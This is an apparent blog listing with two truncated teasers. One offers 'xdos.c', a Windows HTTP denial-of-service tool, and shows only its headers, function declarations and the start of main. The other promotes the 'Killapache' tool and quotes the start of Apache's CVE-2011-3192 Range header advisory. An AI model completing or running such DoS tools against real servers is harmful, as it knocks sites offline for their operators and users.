xdos.c: A Simple HTTP DoS Tool! ~ C programming Code

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. #define WIN32_LEAN_AND_MEAN#include <stdio.h>#include <windows.h>#include <winsock2.h>unsigned long thread = 0;static int connect_tv(struct sockaddr_in *addr, int timeout);static DWORD WINAPI dosmain(LPVOID p);const int main(int argc, char *argv[]){ if(argc != 4) { puts(“ttttXDOS – by […]

New DDOS Tool(Killapache)-65% of Internet(websites) is vulnerable |Apache Killer

Apache server announced 65% websites are vulnerable to DDOS tool. —–BEGIN PGP SIGNED MESSAGE—–Hash: SHA1 Apache HTTPD Security ADVISORY ==============================Title: Range header DoS vulnerability Apache HTTPD 1.3/2.xCVE: CVE-2011-3192: Date: 20110824 1600ZProduct: Apache HTTPD Web ServerVersions: Apache 1.3 all versions, Apache 2 all versionsDescription:============A denial of service vulnerability has been found in the way the multiple […]